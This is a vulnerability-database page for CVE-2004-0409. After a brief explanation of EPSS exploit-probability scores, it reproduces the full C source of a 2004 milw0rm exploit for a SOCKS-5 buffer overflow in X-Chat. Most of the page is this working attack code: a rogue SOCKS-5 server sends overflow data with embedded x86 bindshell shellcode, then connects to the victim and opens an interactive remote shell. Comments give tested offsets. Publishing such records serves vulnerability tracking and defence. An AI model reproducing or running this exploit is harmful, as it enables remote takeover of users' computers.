CVE-2004-0409 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/*[ X-Chat[v1.8.0 - v2.0.8]: socks-5 remote buffer overflow exploit. ] * * * * by: vade79/v9 v9 fakehalo deadpig org (fakehalo/realhalo) * * * * X-Chat homepage: * * http://www.xchat.org * * * * compile: * * cc xxchat-socks5.c -o xxchat-socks5 * * * * trigger bug/workings(X-Chat socks-5 comminucation): * * 0x05,0x00 * * 0x05,0x00,0x00,0x03 * * 0x?? (the size of the following "data", 255MAX(char/int8)) * * 0x??,0x??,0x?? ... ("data") * * * * ie. "\x05\x00\x05\x00\x00\x03\xffxxxxxxxxxxxxxxxxxxxxxxxxxxxx..." * * * * the "data", limited by the previous byte, is then copied into a * * 10 byte buffer labeled buf[]. the idea is to set the size of * * the incoming data to a larger size than expected(ie. 0xff/255MAX), * * followed by sending that amount of data to exceed the 10 byte * * buffer boundary and overwrite memory addresses(stack based). * * * * the problem with the size limit is that it is defined in one * * character(char/int8), making a maximum of up to 255 bytes to be * * written to buf[]. so, this only leaves about ~100+ nops breathing * * room per offset. another problem is that the location of the * * shellcode depends on where/what X-Chat has already done. those * * two things together make for a very unpractical "in the wild" * * exploit scenario. * * * * i just saw several cryptic advisories about this bug, so i figured * * i would look into it and see exactly what it was. * * * * if X-Chat attempts to connect to a server(through socks-5) * * immediately upon the start of X-Chat("autoconnect") it will make * * the shellcode location a bit easier to find. on both source * * compiled version 1.8.0(on rh7.1) and mandrake's rpm static binary * * version 2.0.5(on mdk9.1) an offset of 2600 worked. * * * * note: the first thing that is sent to the bindshell, upon * * successful exploitation, is "killall -9 xchat". this will kill * * X-Chat, but still keep the bindshell alive/active. when searching * * for the correct offset, use increments of 100(100,200,300,...). * **********************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <signal.h> #include <unistd.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <netinet/in.h> #include <arpa/inet.h> #define BUFSIZE 255 #define BSEADDR 0xbffffffa #define DFLPORT 1080 #define DFLSPRT 7979 #define TIMEOUT 5 static char x86_exec[]= /* bindshell(??), netric based. */ "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66" "\xcd\x80\x31\xd2\x52\x66\x68\x00\x00\x43\x66\x53\x89" "\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89" "\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52" "\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80" "\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd" "\x80"; char *getcode(unsigned int); char *socks5_bind(unsigned short,unsigned int); void getshell(char *,unsigned short); void printe(char *,short); void sig_alarm(){printe("alarm/timeout hit.",1);} int main(int argc,char **argv){ unsigned short port=DFLPORT,sport=DFLSPRT; unsigned int retaddr=BSEADDR; char *hostptr; if(BUFSIZE<0||BUFSIZE>255)printe("BUFSIZE must be 1-255(char/int8).",1); printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp" "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n"); if(argc<2){ printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n", argv[0],BSEADDR); exit(1); } if(argc>1)retaddr-=atoi(argv[1]); if(argc>2)port=atoi(argv[2]); if(argc>3)sport=atoi(argv[3]); x86_exec[20]=(sport&0xff00)>>8; x86_exec[21]=(sport&0x00ff); printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n", retaddr,port,sport); hostptr=socks5_bind(port,retaddr); sleep(1); getshell(hostptr,sport); exit(0); } char *getcode(unsigned int retaddr){ unsigned char i=0; char *buf; if(!(buf=(char *)malloc(BUFSIZE+1))) printe("getcode(): allocating memory failed.",1); memset(buf,0x90,BUFSIZE); for(i=0;i<64;i+=4){*(long *)&buf[i]=retaddr;} memcpy((buf+BUFSIZE-strlen(x86_exec)),x86_exec,strlen(x86_exec)); return(buf); } char *socks5_bind(unsigned short port,unsigned int retaddr){ int ssock=0,sock=0,so=1; socklen_t salen=0; unsigned char *buf; struct sockaddr_in ssa,sa; ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so)); #ifdef SO_REUSEPORT setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so)); #endif ssa.sin_family=AF_INET; ssa.sin_port=htons(port); ssa.sin_addr.s_addr=INADDR_ANY; printf("[*] awaiting connection from: *:%d.\n",port); if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1) printe("could not bind socket.",1); listen(ssock,2); bzero((char*)&sa,sizeof(struct sockaddr_in)); salen=sizeof(sa); sock=accept(ssock,(struct sockaddr *)&sa,&salen); close(ssock); printf("[*] socks-5 server connection established.\n"); if(!(buf=(unsigned char *)malloc(BUFSIZE+7+1))) printe("socks5_bind(): allocating memory failed.",1); memcpy(buf,"\x05\x00\x05\x00\x00\x03",6); buf[6]=BUFSIZE; memcpy(buf+7,getcode(retaddr),BUFSIZE); printf("[*] sending specially crafted string. (exploit)\n"); write(sock,buf,BUFSIZE+7); free(buf); sleep(1); close(sock); printf("[*] socks-5 server connection closed.\n"); return(inet_ntoa(sa.sin_addr)); } void getshell(char *hostname,unsigned short port){ int sock,r; fd_set fds; char buf[4096+1]; struct hostent *he; struct sockaddr_in sa; printf("[*] checking to see if the exploit was successful.\n"); if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) printe("getshell(): socket() failed.",1); sa.sin_family=AF_INET; if((sa.sin_addr.s_addr=inet_addr(hostname))){ if(!(he=gethostbyname(hostname))) printe("getshell(): couldn't resolve.",1); memcpy((char *)&sa.sin_addr,(char *)he->h_addr, sizeof(sa.sin_addr)); } sa.sin_port=htons(port); signal(SIGALRM,sig_alarm); alarm(TIMEOUT); printf("[*] attempting to connect: %s:%d.\n",hostname,port); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){ printf("[!] connection failed: %s:%d.\n",hostname,port); return; } alarm(0); printf("[*] successfully connected: %s:%d.\n\n",hostname,port); signal(SIGINT,SIG_IGN); write(sock,"uname -a;id ;killall -9 xchat\n",30); while(1){ FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sock,&fds); if(select(sock+1,&fds,0,0,0)<1) printe("getshell(): select() failed.",1); if(FD_ISSET(0,&fds)){ if((r=read(0,buf,4096))<1) printe("getshell(): read() failed.",1); if(write(sock,buf,r)!=r) printe("getshell(): write() failed.",1); } if(FD_ISSET(sock,&fds)){ if((r=read(sock,buf,4096))<1) exit(0); write(1,buf,r); } } close(sock); return; } void printe(char *err,short e){ printf("[!] %s\n",err); if(e)exit(1); return; } // milw0rm.com [2004-05-05]